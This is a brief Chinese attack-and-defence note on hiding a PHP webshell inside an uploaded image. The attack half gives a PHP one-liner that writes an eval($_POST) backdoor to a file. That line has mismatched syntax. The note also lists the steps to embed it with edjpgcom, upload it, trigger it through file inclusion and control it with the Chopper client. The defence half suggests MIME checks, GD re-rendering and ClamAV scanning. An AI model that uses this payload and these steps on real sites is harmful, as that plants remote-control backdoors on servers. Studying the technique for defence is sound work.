攻
1: 图片加马
将图片直接拖到edjpgcom.exe程序上
填入PHP一句话:<?php fputs(fopen("shell.txt","w")),'<?php eval($_POST['shell']);?>
notepad++打开文件, 可以看到如下
2: 上传图片
3: 利用文件包含执行上传文件生成后门
4: 通过菜刀连接webshell
防
1: 先mime判断,如果为
图片类型
则通过 GD 函数处理生成 thumbnail,同时保存 origin 图片文件。
2: 可以用linux服务器上的木马扫描软件,比如 Clamav 支持命令行执行的,上传之后就扫一下,最可靠,
$last_line = system('php /var/bin/clamdscan upload.jpg');
根据扫描结果就可以判断了